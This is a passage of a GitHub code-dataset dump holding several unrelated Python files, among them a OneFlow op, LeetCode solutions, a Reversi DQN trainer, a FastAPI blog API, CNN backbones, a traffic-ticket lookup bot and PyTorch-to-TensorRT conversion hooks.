client_cmd(protocol)\n","repo_name":"oVirt/vdsm","sub_path":"tests/ssl_test.py","file_name":"ssl_test.py","file_ext":"py","file_size_in_byte":4490,"program_lang":"python","lang":"en","doc_type":"code","stars":147,"dataset":"github-code","pt":"16"} +{"seq_id":"19806580385","text":"from __future__ import absolute_import\n\n\nimport oneflow.core.operator.op_conf_pb2 as op_conf_util\nimport oneflow.core.register.logical_blob_id_pb2 as logical_blob_id_util\nimport oneflow.python.framework.interpret_util as interpret_util\nimport oneflow.python.framework.distribute as distribute_util\nimport oneflow.python.framework.id_util as id_util\nimport oneflow.python.framework.input_blob_def as input_blob_util\nimport oneflow.python.framework.remote_blob as remote_blob_util\nfrom oneflow.python.oneflow_export import oneflow_export\nfrom typing import Optional, Tuple\n\n\n@oneflow_export(\"experimental.indexed_slices_reduce_sum\")\ndef indexed_slices_reduce_sum(\n indices: input_blob_util.ArgBlobDef,\n values: input_blob_util.ArgBlobDef,\n name: Optional[str] = None,\n) -> Tuple[remote_blob_util.BlobDef]:\n op_conf = op_conf_util.OperatorConf()\n if name is None:\n op_conf.name = id_util.UniqueStr(\"IndexedSlicesReduceSum_\")\n else:\n op_conf.name = name\n\n op_conf.indexed_slices_reduce_sum_conf.x_indices = indices.unique_name\n op_conf.indexed_slices_reduce_sum_conf.x_values = values.unique_name\n op_conf.indexed_slices_reduce_sum_conf.y_indices = \"y_indices\"\n op_conf.indexed_slices_reduce_sum_conf.y_values = \"y_values\"\n op_conf.indexed_slices_reduce_sum_conf.num_unique = \"num_unique\"\n\n interpret_util.Forward(op_conf)\n y_indices_lbi = logical_blob_id_util.LogicalBlobId()\n y_indices_lbi.op_name = op_conf.name\n y_indices_lbi.blob_name = \"y_indices\"\n y_values_lbi = logical_blob_id_util.LogicalBlobId()\n y_values_lbi.op_name = op_conf.name\n y_values_lbi.blob_name = \"y_values\"\n num_unique_lbi = logical_blob_id_util.LogicalBlobId()\n num_unique_lbi.op_name = op_conf.name\n num_unique_lbi.blob_name = \"num_unique\"\n\n return (\n remote_blob_util.RemoteBlob(y_indices_lbi),\n remote_blob_util.RemoteBlob(y_values_lbi),\n remote_blob_util.RemoteBlob(num_unique_lbi),\n )\n","repo_name":"Sodu-Qinming/Oneflow","sub_path":"oneflow/python/experimental/indexed_slices_ops.py","file_name":"indexed_slices_ops.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23636562039","text":"class DiameterOfBinaryTree:\n \"\"\"\n Desc:\n # 543\n Given the root of a binary tree, return the length of the diameter of the tree.\n Link: \n https://leetcode.com/problems/diameter-of-binary-tree/\n Notes:\n \"\"\"\n\n # dfs\n # Time: O(n) - nodes in tree\n # Space: O(n)\n def diameterOfBinaryTree(self, root): \n # the diameter is the longest path b/n any two nodes\n # path is a cnt of edges\n \n res = 0\n \n # for each node get length of left and right path\n # res = max(left + right paths, res)\n \n def maxPath(n):\n if not n: return 0\n \n nonlocal res\n \n # get max paths\n left = maxPath(n.left) \n right = maxPath(n.right)\n path = 1 + max(left, right)\n \n # check diameter \n res = max(res, left + right)\n \n return path \n \n maxPath(root)\n return res\n\n\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right","repo_name":"csdatasist/lc-repo","sub_path":"others/DiameterOfBinaryTree.py","file_name":"DiameterOfBinaryTree.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27489946784","text":"import numpy as np\r\n\r\nimport argparse\r\nfrom reversi import Reversi\r\nfrom dqn_agent import DQNAgent\r\nfrom random_agent import RANDOMAgent\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"-m\", \"--model_path\", help='Path ot the model files')\r\n parser.add_argument(\"-l\", \"--load\", dest=\"load\", action=\"store_true\",\r\n default=False, help='Load trained model (default: off)')\r\n parser.add_argument(\"-e\", \"--epoch-num\", dest=\"n_epochs\", default=30,\r\n type=int, help='Numpber of training epochs (default: 1000)')\r\n parser.add_argument(\"--simple\", dest=\"is_simple\", action=\"store_true\", default=True,\r\n help='Train simple model without cnn (8 x 8) (default: true)')\r\n parser.add_argument(\"-g\", \"--graves\", dest=\"graves\", action=\"store_true\",\r\n default=False, help='Use RmpropGraves (default: off)')\r\n parser.add_argument(\"-d\", \"--ddqn\", dest=\"ddqn\", action=\"store_true\",\r\n default=False, help='Use Double DQN (default: off)')\r\n parser.add_argument(\"-s\", \"--save-interval\", dest=\"save_interval\", default=15, type=int) # 1000\r\n args = parser.parse_args()\r\n\r\n # parameters\r\n n_epochs = args.n_epochs\r\n\r\n # environment, agent\r\n env = Reversi()\r\n\r\n # playerID\r\n playerID = [env.Black, env.White, env.Black]\r\n\r\n # player agent\r\n players = []\r\n # player[0] = env.Black\r\n agent = DQNAgent(env.enable_actions, env.name, color=\"black\", ddqn=args.ddqn)\r\n if args.load:\r\n agent.load_model(args.model_path)\r\n else:\r\n agent.init_model()\r\n players.append(agent)\r\n\r\n # player[1] = env.White\r\n agent = RANDOMAgent(env.enable_actions, env.name, color=\"white\")\r\n players.append(agent)\r\n\r\n # # variables\r\n wins = [0, 0]\r\n e = 0 # エポック数\r\n \r\n while e < n_epochs:\r\n # reset\r\n env.reset()\r\n\r\n state_ts = [None, None]\r\n action_ts = [None, None]\r\n state_t_1s = [None, None]\r\n reward_ts = [None, None]\r\n terminals = [None, None]\r\n \r\n while not env.isEnd():\r\n\r\n # 次の手番の人をゲットする\r\n # ゲームが終わっていない以上、BlackかWhiteしか出ない\r\n next_player_color = env.get_next_player()\r\n idx = 0 if next_player_color == env.Black else 1 if next_player_color == env.White else None # Noneだとプログラムおかしい\r\n\r\n # observe environment\r\n state_t_1s[idx], reward_ts[idx], terminals[idx] = env.observe(next_player_color)\r\n\r\n # 1時刻前の結果をstoreにpushしておく\r\n # 本来はenv.execute_action(action_ts[col], playerID[col])の後に、env.observe()とstore_experienceを実行したいが、\r\n # 相手番との兼ね合いがあるので、また自分の手番になった際に代入するようにしている\r\n if action_ts[idx] != None:\r\n players[idx].store_experience([state_ts[idx]], action_ts[idx], reward_ts[idx], [state_t_1s[idx]], terminals[idx])\r\n\r\n # 着手する盤面をstate_tに代入\r\n state_ts[idx] = state_t_1s[idx] \r\n # 行動を選択\r\n action_ts[idx] = players[idx].select_action([state_ts[idx]], players[idx].exploration)\r\n # 実際に環境に対してアクションを起こす\r\n env.execute_action(action_ts[idx], playerID[idx])\r\n\r\n # whileを抜けたということはゲームが終わったということ\r\n # 最後のstore_experienceを代入する\r\n for i, color in enumerate([env.Black, env.White]):\r\n state_t_1s[i], reward_ts[i], terminals[i] = env.observe(color)\r\n players[i].store_experience([state_ts[i]], action_ts[i], reward_ts[i], [state_t_1s[i]], terminals[i])\r\n\r\n if reward_ts[i] == 1:\r\n wins[i] += 1\r\n \r\n # 1試合終わったら学習を開始する ⇒ N試合終わったら学習を開始するに変更する\r\n\r\n # εの値を小さくする\r\n players[0].update_exploration(e)\r\n players[1].update_exploration(e)\r\n\r\n # 学習\r\n players[0].experience_replay(e)\r\n players[1].experience_replay(e)\r\n\r\n # 10試合でtarget_modelもupdateする\r\n if e % 10:\r\n players[0].update_target_model\r\n players[1].update_target_model\r\n players[0].reset_experience()\r\n players[1].reset_experience()\r\n\r\n print(f\"EPOCH: {e:03d}/{n_epochs - 1:03d} | BLACK_WIN: {wins[0]:03d} | WHITE_WIN: {wins[1]:03d}\")\r\n if e > 0 and e % args.save_interval == 0:\r\n players[0].save_model(e)\r\n players[0].save_model()\r\n players[1].save_model(e)\r\n players[1].save_model()\r\n e += 1\r\n\r\n # save model\r\n players[0].save_model()\r\n players[1].save_model()\r\n","repo_name":"youseegreen/reversi_keras_dqn","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34754001259","text":"from fastapi import FastAPI, Depends, status, Response, HTTPException\r\nimport models, schemas\r\nfrom database import engine, SessionLocal\r\nfrom sqlalchemy.orm import Session\r\n\r\napp = FastAPI()\r\n\r\nmodels.Base.metadata.create_all(bind=engine)\r\n\r\ndef get_db():\r\n\tdb = SessionLocal()\r\n\ttry:\r\n\t\tyield db\r\n\tfinally:\r\n\t\tdb.close()\r\n\r\n# Create a Blog\r\n\r\n@app.post('/blogs', status_code=status.HTTP_201_CREATED) #status_code=201 also works\r\ndef create(blog:schemas.Blog, db:Session = Depends(get_db)):\r\n\tnew_blog = models.Blog(title=blog.title, body=blog.body)\r\n\tdb.add(new_blog)\r\n\tdb.commit()\r\n\tdb.refresh(new_blog)\r\n\treturn new_blog\r\n\r\n# Delete a Blog\r\n\r\n@app.delete('/blogs/{id}', status_code=status.HTTP_204_NO_CONTENT)\r\ndef destroy(id:int, db:Session=Depends(get_db)):\r\n\tblog = db.query(models.Blog).filter(models.Blog.id == id)\r\n\tif not blog.first():\r\n\t\traise HTTPException(status_code=status.HTTP_404_NOT_FOUND, \r\n\t\t\t\t\t\t\tdetail=f'Blog {id} not found.')\r\n\tblog.delete(synchronize_session=False)\r\n\tdb.commit()\r\n\treturn {'detail':f'Blog {id} has been deleted.'}\r\n\r\n# Update a Blog\r\n\r\n@app.put('/blog/{id}', status_code=status.HTTP_202_ACCEPTED)\r\ndef update(id:int, blog:schemas.Blog, db:Session = Depends(get_db)):\r\n\tblog_ = db.query(models.Blog).filter(models.Blog.id == id)\r\n\tif not blog_.first():\r\n\t\traise HTTPException(status_code=status.HTTP_404_NOT_FOUND, \r\n\t\t\t\t\t\t\tdetail=f'Blog {id} not found.')\r\n\tblog_.update(blog, synchronize_session=False)\r\n\tdb.commit()\r\n\treturn f'Blog {id} updated successfully.'\r\n\r\n# Show all Blogs\r\n\r\n@app.get('/blogs')\r\ndef all(db:Session=Depends(get_db)):\r\n\tblogs = db.query(models.Blog).all()\r\n\treturn blogs\r\n\r\n# Show a particular Blog\r\n@app.get('/blogs/{id}', status_code=200)\r\ndef show(id:int, response:Response, db:Session=Depends(get_db)):\r\n\t# blog = db.query(models.Blog)[id-1]\r\n\tblog = db.query(models.Blog).filter(models.Blog.id == id).first()\r\n\t\r\n\tif not blog:\r\n\t\t#response.status_code = status.HTTP_404_NOT_FOUND\r\n\t\t#return {'detail':f'Blog with ID {id} not found'}\r\n\t\t\r\n\t\traise HTTPException(status_code=status.HTTP_404_NOT_FOUND, \r\n\t\t\t\t\t\t\tdetail=f'Blog with ID {id} not found')\r\n\r\n\t\r\n\treturn blog","repo_name":"suprateembanerjee/debug","sub_path":"blog/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6445170157","text":"import torch.nn as nn\nfrom torchvision import models as models_2d\n\n\nclass Identity(nn.Module):\n \"\"\"Identity layer to replace last fully connected layer\"\"\"\n\n def forward(self, x):\n return x\n\n\n################################################################################\n# ResNet Family\n################################################################################\n\n\ndef resnet_18(pretrained=True):\n model = models_2d.resnet18(pretrained=pretrained)\n feature_dims = model.fc.in_features\n model.fc = Identity()\n return model, feature_dims, 1024\n\n\ndef resnet_34(pretrained=True):\n model = models_2d.resnet34(pretrained=pretrained)\n feature_dims = model.fc.in_features\n model.fc = Identity()\n return model, feature_dims, 1024\n\n\ndef resnet_50(pretrained=True):\n model = models_2d.resnet50(pretrained=pretrained)\n feature_dims = model.fc.in_features\n model.fc = Identity()\n return model, feature_dims, 1024\n\n\n################################################################################\n# DenseNet Family\n################################################################################\n\n\ndef densenet_121(pretrained=True):\n model = models_2d.densenet121(pretrained=pretrained)\n feature_dims = model.classifier.in_features\n model.classifier = Identity()\n return model, feature_dims, None\n\n\ndef densenet_161(pretrained=True):\n model = models_2d.densenet161(pretrained=pretrained)\n feature_dims = model.classifier.in_features\n model.classifier = Identity()\n return model, feature_dims, None\n\n\ndef densenet_169(pretrained=True):\n model = models_2d.densenet169(pretrained=pretrained)\n feature_dims = model.classifier.in_features\n model.classifier = Identity()\n return model, feature_dims, None\n\n\n################################################################################\n# ResNextNet Family\n################################################################################\n\n\ndef resnext_50(pretrained=True):\n model = models_2d.resnext50_32x4d(pretrained=pretrained)\n feature_dims = model.fc.in_features\n model.fc = Identity()\n return model, feature_dims, None\n\n\ndef resnext_100(pretrained=True):\n model = models_2d.resnext101_32x8d(pretrained=pretrained)\n feature_dims = model.fc.in_features\n model.fc = Identity()\n return model, feature_dims, None\n","repo_name":"marshuang80/gloria","sub_path":"gloria/models/cnn_backbones.py","file_name":"cnn_backbones.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"16"} +{"seq_id":"6551110425","text":"\"\"\"\r\nGiven an integer array nums, find a \r\nsubarray that has the largest product, and return the product.\r\n\"\"\"\r\n\r\ndef maxProduct(self, nums) -> int:\r\n maxi = float('-inf')\r\n pref = 1\r\n suff = 1\r\n for i in range(len(nums)):\r\n if pref == 0 : pref = 1\r\n if suff == 0 : suff = 1\r\n pref *= nums[i]\r\n suff *= nums[len(nums)-i-1]\r\n maxi = max(maxi,pref,suff)\r\n return maxi","repo_name":"AyusDas/dsa","sub_path":"imp_algo/Subarray/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11548067971","text":"\"\"\"Template robot with Python.\"\"\"\nfrom handlers import process\nfrom service import final_json\nimport json\nfrom RPA.Robocorp.WorkItems import WorkItems\n\nworkitem = WorkItems()\nworkitem.get_input_work_item()\ncomparendo_list = [\"comparendo_type\", \"comparendo_status\", \"id_comparendo\", \"dummy\", \"placa\", \"comparendo_date\", \"comparendo_saldo\", \"comparen_intereses\", \"comparendo_total\", \"comparendo_medium\"]\nurl = \"https://consultas.transitobogota.gov.co:8010/publico/index3.php\"\nplate_number = workitem.get_work_item_variable(\"placa\") #\"BRY010gy\"\ndoc_number = workitem.get_work_item_variable(\"doc_number\")#\"1060634\"\ndoc_type = workitem.get_work_item_variable(\"doc_type\")#\"CE\"\n\n# plate_number = \"BWL600\"\n# doc_number = \"819063\"\n# doc_type = \"CE\"\n\n\n\ndef trafic_ticket():\n try:\n process.open_webpage(url)\n number_of_pages = process.make_search(doc_type, plate_number, doc_number)\n total_comparendo = {}\n final_comparendo = {}\n for j in range(number_of_pages):\n for i in range(50):\n try:\n comparendo_dict = process.scrapr_from_the_initial_table(4+i, comparendo_list)\n if comparendo_dict == \"\":\n break\n else:\n total_comparendo[\"comparendo{0}\".format(i+1)] = comparendo_dict\n except Exception as e:\n raise(e)\n final_comparendo[\"data\"] = total_comparendo\n json_object = json.dumps(final_comparendo, indent=4)\n \n with open(\"./output/schema.json\", \"w\") as outfile:\n outfile.write(json_object)\n workitem.create_output_work_item(variables=final_comparendo, save=True)\n except Exception as e:\n workitem.release_input_work_item(\"FAILED\", \"BUSINESS\", message=e)\n print(\"Done.\")\n\n\nif __name__ == \"__main__\":\n trafic_ticket()\n # captcha_solution = captcha_solver.twocaptcha_solver(\"captcha.png\")\n","repo_name":"Wale17/Traffic-ticket-bot","sub_path":"task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23606993558","text":"import os\nimport json\nimport torch\nimport traceback\nfrom torch import nn\nimport numpy as np\nimport torch.nn.functional as F\nfrom .utils import Json, TransLog, LayerOut_id, REGISTERED_LIST, get_weight\nfrom . import config as cfg\n\n\n\n# global params\nlog = TransLog()\nINLINE = False\nPLULINE = False\nDEBUG = cfg.DEBUG\nPARAM_FLAG = True\nJSON_PARAM = {}\nMODULE_DICT = {}\n\n# Tensor operator\nraw__add__ = torch.Tensor.__add__\nraw__sub__ = torch.Tensor.__sub__\nraw__permute__ = torch.Tensor.permute\nraw__expand_as__ = torch.Tensor.expand_as\n\n\nPLUGINS_LIST = [\n \"BasicBlock\",\n \"Hsigmoid\",\n \"Hswish\",\n]\n\n\ndef get_parameters():\n global PARAM_FLAG\n global JSON_PARAM\n\n if PARAM_FLAG:\n js_init = Json(os.path.join(cfg.JSON_FILE_DIR, cfg.MODELNAME, cfg.MODELNAME + \".json\"))\n js_param = js_init.get_json_param()\n JSON_PARAM = js_param\n PARAM_FLAG = False\n return js_param\n\n js_param = JSON_PARAM\n\n return js_param\n\n\n# nn.Conv2d ---> F.conv2d\ndef _conv2d(raw, input, weight, bias=None, stride=1, padding=0, dilation=1, groups=1):\n global INLINE\n x = raw(input, weight, bias, stride, padding, dilation, groups)\n INLINE = True\n name = log.add_layer(name=\"conv2d_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # extract weight to get wgt\n get_weight(weight, f\"{name}.weight\")\n weightKey = f\"{name}\"\n biasKey = f\"{name}\"\n\n # add json params\n if bias is not None:\n get_weight(bias, f\"{name}.bias\")\n biasFile = f\"{name}\"\n\n conv_params = dict(\n {\n \"layerStyle\": \"conv\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"weightKey\": weightKey,\n \"biasKey\": biasKey,\n \"parameter\": {\n \"input_c\": input.shape[1],\n \"output_c\": x.shape[1],\n \"kernel\": [weight.shape[2], weight.shape[3]],\n \"padding\": padding,\n \"stride\": stride,\n \"dilation\": dilation,\n \"groups\": groups,\n },\n }\n )\n\n if DEBUG:\n print(conv_params)\n js_param = get_parameters()\n js_param[\"network\"].append(conv_params)\n INLINE = False\n return x\n\n\n# nn.ReLU ----> F.relu\ndef _relu(raw, input, inplace=False):\n global INLINE\n name = log.add_layer(name=\"relu_\")\n inputName_ = log.blobs(input, name) # 这样防止 x == input时,它们id一致\n x = raw(input, inplace)\n INLINE = True\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight to extract\n # add json params\n relu_params = dict(\n {\n \"layerStyle\": \"active\",\n \"layerName\": name,\n \"inputName\": inputName_,\n \"activeType\": \"relu\",\n }\n )\n if DEBUG:\n print(relu_params)\n js_param = get_parameters()\n js_param[\"network\"].append(relu_params)\n INLINE = False\n return x\n\n\n# nn.leakyReLU ---> F.leakyReLU\ndef _leaky_relu(raw, input, negative_slope=0.01, inplace=False):\n global INLINE\n x = raw(input, negative_slope, inplace)\n INLINE = True\n name = log.add_layer(name=\"leaky_relu_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight to extract\n # add json params\n leaky_relu_params = dict(\n {\"layerStyle\": \"active\", \"layerName\": name, \"inputName\": log.blobs(input, name), \"active_type\": \"l_relu\"}\n )\n\n if DEBUG:\n print(leaky_relu_params)\n js_param = get_parameters()\n js_param[\"network\"].append(leaky_relu_params)\n INLINE = False\n return x\n\n\n# nn,MaxPool2d ---> F.max_pool2d\ndef _max_pool2d(raw, *args, **kwargs):\n global INLINE\n # args = (input, kernel, stride, padding, dilation, ceil_mode, return_indices)\n x = raw(*args, **kwargs)\n INLINE = True\n name = log.add_layer(name=\"max_pool2d_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight to extract\n # add json params\n max_pool2d_params = dict(\n {\n \"layerStyle\": \"pool\",\n \"layerName\": name,\n \"inputName\": log.blobs(args[0], name),\n \"parameter\": {\n \"poolType\": \"kMAX\",\n # \"kernel\": [kernel_size, kernel_size] if isinstance(kernel_size, int) else kernel_size,\n # \"stride\": [stride, stride] if isinstance(stride, int) else stride,\n # \"padding\": [padding, padding] if isinstance(padding, int) else padding,\n \"kernel\": [args[1], args[1]] if isinstance(args[1], int) else args[1],\n \"stride\": [args[2], args[2]] if isinstance(args[2], int) else args[2],\n \"padding\": [args[3], args[3]] if isinstance(args[3], int) else args[3],\n },\n }\n )\n if DEBUG:\n print(max_pool2d_params)\n js_param = get_parameters()\n js_param[\"network\"].append(max_pool2d_params)\n INLINE = False\n return x\n\n\n# nn.AvgPool2d ----> F.avg_pool2d\ndef _avg_pool2d(\n raw,\n input,\n kernel_size,\n stride=None,\n padding=0,\n ceil_mode=False,\n count_include_pad=True,\n divisor_override=None,\n):\n global INLINE\n x = raw(input, kernel_size, stride=None, padding=0, ceil_mode=False, count_include_pad=True, divisor_override=None)\n INLINE = True\n name = log.add_layer(name=\"avg_pool2d_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight to extract\n # add json params\n avg_pool2d_params = dict(\n {\n \"layerStyle\": \"pool\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"parameter\": {\n \"poolType\": \"kAVERAGE\",\n \"kernel\": [kernel_size, kernel_size] if isinstance(kernel_size, int) else kernel_size,\n \"stride\": [stride, stride] if isinstance(stride, int) else stride,\n \"padding\": [padding, padding] if isinstance(padding, int) else padding,\n },\n }\n )\n if DEBUG:\n print(avg_pool2d_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(avg_pool2d_params)\n INLINE = False\n return x\n\n\n# nn.Linear ---> F.linear\ndef _linear(raw, input, weight, bias=None):\n global INLINE\n x = raw(input, weight, bias)\n INLINE = True\n name = log.add_layer(name=\"linear_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # extract weight\n get_weight(weight, f\"{name}.weight\")\n weightKey = f\"{name}\"\n biasKey = f\"{name}\"\n if bias is not None:\n get_weight(bias, f\"{name}.bias\")\n biasKey = f\"{name}\"\n # add json param\n linear_params = dict(\n {\n \"layerStyle\": \"fc\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"weightKey\": weightKey,\n \"parameter\": {\"input_c\": input.shape[1], \"output_c\": x.shape[1]},\n }\n )\n if bias is not None:\n linear_params[\"biasKey\"] = biasKey\n if DEBUG:\n print(linear_params)\n js_param = get_parameters()\n js_param[\"network\"].append(linear_params)\n INLINE = False\n return x\n\n\n# nn.AdaptiveAvgPool2d ---> F.adaptive_avg_pool2d\n# tensorrt not support, just pytorch test\ndef _adaptive_avg_pool2d(raw, input, output_size):\n global INLINE\n x = raw(input, output_size)\n INLINE = True\n name = log.add_layer(name=\"adaptive_avg_pool2d_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n if isinstance(output_size, int):\n out_size_0 = output_size\n out_size_1 = output_size\n else:\n out_size_0 = output_size[0]\n out_size_1 = output_size[1]\n\n input_sz = np.array(input.shape[2:]) # input_size [H * W]\n output_sz = np.array([out_size_0, out_size_1])\n\n stride_sz = np.floor(input_sz / output_sz)\n kernel_sz = input_sz - (output_sz - 1) * stride_sz\n\n # no weight extract\n # add json params\n adaptive_avg_pool2d_params = dict(\n {\n \"layerStyle\": \"pool\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"parameter\": {\n \"poolType\": \"kAVG\",\n \"kernel\": [int(kernel_sz[0]), int(kernel_sz[1])],\n \"stride\": [int(stride_sz[0]), int(stride_sz[1])],\n \"padding\": [0, 0],\n },\n }\n )\n if DEBUG:\n print(adaptive_avg_pool2d_params)\n js_param = get_parameters()\n js_param[\"network\"].append(adaptive_avg_pool2d_params)\n INLINE = False\n return x\n\n\n# nn.Softmax ---> F.softmax\ndef _softmax(raw, input, dim=None, _stacklevel=3, dtype=None):\n global INLINE\n x = raw(input, dim, _stacklevel, dtype)\n INLINE = True\n name = log.add_layer(name=\"softmax_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight to extract\n # add json params\n softmax_params = dict(\n {\n \"layerStyle\": \"softmax\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n }\n )\n if DEBUG:\n print(softmax_params)\n js_param = get_parameters()\n js_param[\"network\"].append(softmax_params)\n INLINE = False\n return x\n\n\n# ConvTranspose2d ---> F.conv_transpose2d\ndef _conv_transpose2d(raw, input, weight, bias=None, stride=1, padding=0, output_padding=0, groups=1, dilation=1):\n global INLINE\n x = raw(input, weight, bias, stride, padding, output_padding, groups, dilation)\n INLINE = True\n name = log.add_layer(name=\"Deconv2d_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # extract weight\n get_weight(weight, f\"{name}.weight\")\n weightKey = f\"{name}\"\n if bias is not None:\n get_weight(bias, f\"{name}.bias\")\n biasFile = f\"{name}.bias\"\n\n # add json params\n conv_transpose2d_params = dict(\n {\n \"layerStyle\": \"deconv\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"weightKey\": weightKey,\n \"parameter\": {\n \"input_c\": input.shape[1],\n \"output_c\": x.shape[1],\n \"kernel\": [weight.shape[2], weight.shape[3]],\n \"padding\": padding,\n \"stride\": stride,\n },\n }\n )\n if bias is not None:\n conv_transpose2d_params[\"biasFile\"] = biasFile\n if DEBUG:\n print(conv_transpose2d_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(conv_transpose2d_params)\n return x\n\n\n# ['ConstantPad1d', 'ConstantPad2d', 'ConstantPad3d'] ---> F.pad\ndef _pad(raw, input, pad, mode=\"constant\", value=0):\n global INLINE\n x = raw(input, pad, mode, value)\n INLINE = True\n name = log.add_layer(name=\"pad_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # not weight extract\n # add json params\n pad_params = dict(\n {\n \"layerStyle\": \"padding\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"parameter\": {\n \"input_c\": input.shape[1],\n \"prePadding\": [0, 0],\n \"postPadding\": [1, 1],\n },\n }\n )\n if DEBUG:\n print(pad_params)\n js_param = get_parameters()\n js_param[\"network\"].append(pad_params)\n INLINE = False\n return x\n\n\n# F.interpolate\ndef _interpolate(\n raw, input, size=None, scale_factor=None, mode=\"nearest\", align_corners=None, recompute_scale_factor=None\n):\n global INLINE\n x = raw(input, size, scale_factor, mode, align_corners, recompute_scale_factor)\n INLINE = True\n name = log.add_layer(name=\"interpolate_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight extract\n # add json param\n resizeMode = {\"nearest\": 0, \"bilinear\": 1}\n interpolate_params = dict(\n {\n \"layerStyle\": \"resize\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"resizeMode\": resizeMode[mode],\n \"alignCorners\": align_corners,\n \"resizeDim\": size,\n }\n )\n if DEBUG:\n print(interpolate_params)\n js_param = get_parameters()\n js_param[\"network\"].append(interpolate_params)\n INLINE = False\n return x\n\n\n# nn.BathcNorm --> F.batch_norm\ndef _batch_norm(\n raw, input, weight, bias, running_mean, running_var, training, momentum, eps, torch_backends_cudnn_enabled\n):\n global INLINE\n x = raw(input, weight, bias, running_mean, running_var, training, momentum, eps, torch_backends_cudnn_enabled)\n INLINE = True\n name = log.add_layer(name=\"BN_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # extract weight to get wgt\n get_weight(weight, f\"{name}.weight\")\n get_weight(bias, f\"{name}.bias\")\n get_weight(running_mean, f\"{name}.running_mean\")\n get_weight(running_var, f\"{name}.running_var\")\n\n # add json params\n weightKey = f\"{name}\"\n bn_params = dict(\n {\n \"layerStyle\": \"bn\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"weightKey\": weightKey,\n }\n )\n if DEBUG:\n print(bn_params)\n js_param = get_parameters()\n js_param[\"network\"].append(bn_params)\n INLINE = False\n return x\n\n\n# nn.Sigmoid ---> torch.sigmoid\ndef _sigmoid(raw, input):\n global INLINE\n x = raw(input)\n INLINE = True\n name = log.add_layer(name=\"sigmoid_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weiht to extract\n # add json params\n sigmoid_params = dict(\n {\n \"layerstyle\": \"active\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"active_type\": \"sigmoid\",\n }\n )\n if DEBUG:\n print(sigmoid_params)\n js_param = get_parameters()\n js_param[\"network\"].append(sigmoid_params)\n INLINE = False\n return x\n\n\n# torch.flatten\ndef _flatten(raw, input, start_dim=1, end_dim=-1):\n global INLINE\n x = raw(input, start_dim, end_dim)\n INLINE = True\n name = LayerOut_id[int(id(input))]\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n INLINE = False\n return x\n\n\n# torch.cat\ndef _cat(raw, inputs, dim=0):\n global INLINE\n\n x = raw(inputs, dim)\n INLINE = True\n inputName = []\n for input in inputs:\n inputName.append(log.blobs(input, name=\"cat\"))\n\n name = log.add_layer(name=\"cat_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight extract\n # add json params\n cat_params = dict(\n {\n \"layerStyle\": \"concat\",\n \"layerName\": name,\n \"inputName\": inputName,\n \"axis\": dim,\n }\n )\n if DEBUG:\n print(cat_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(cat_params)\n INLINE = False\n return x\n\n\n# F.instance_norm\ndef _instance_norm(\n raw,\n input,\n weight,\n bias,\n running_mean,\n running_var,\n use_input_stats,\n momentum,\n eps,\n torch_backends_cudnn_enabled,\n):\n global INLINE\n x = raw(\n input, weight, bias, running_mean, running_var, use_input_stats, momentum, eps, torch_backends_cudnn_enabled\n )\n INLINE = True\n name = log.add_layer(name=\"IN_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # extract weight\n get_weight(weight, f\"{name}.weight\")\n get_weight(bias, f\"{name}. bias\")\n\n # add json params\n weightKey = f\"{name}\"\n biasKey = f\"{name}\"\n instance_norm_params = dict(\n {\n 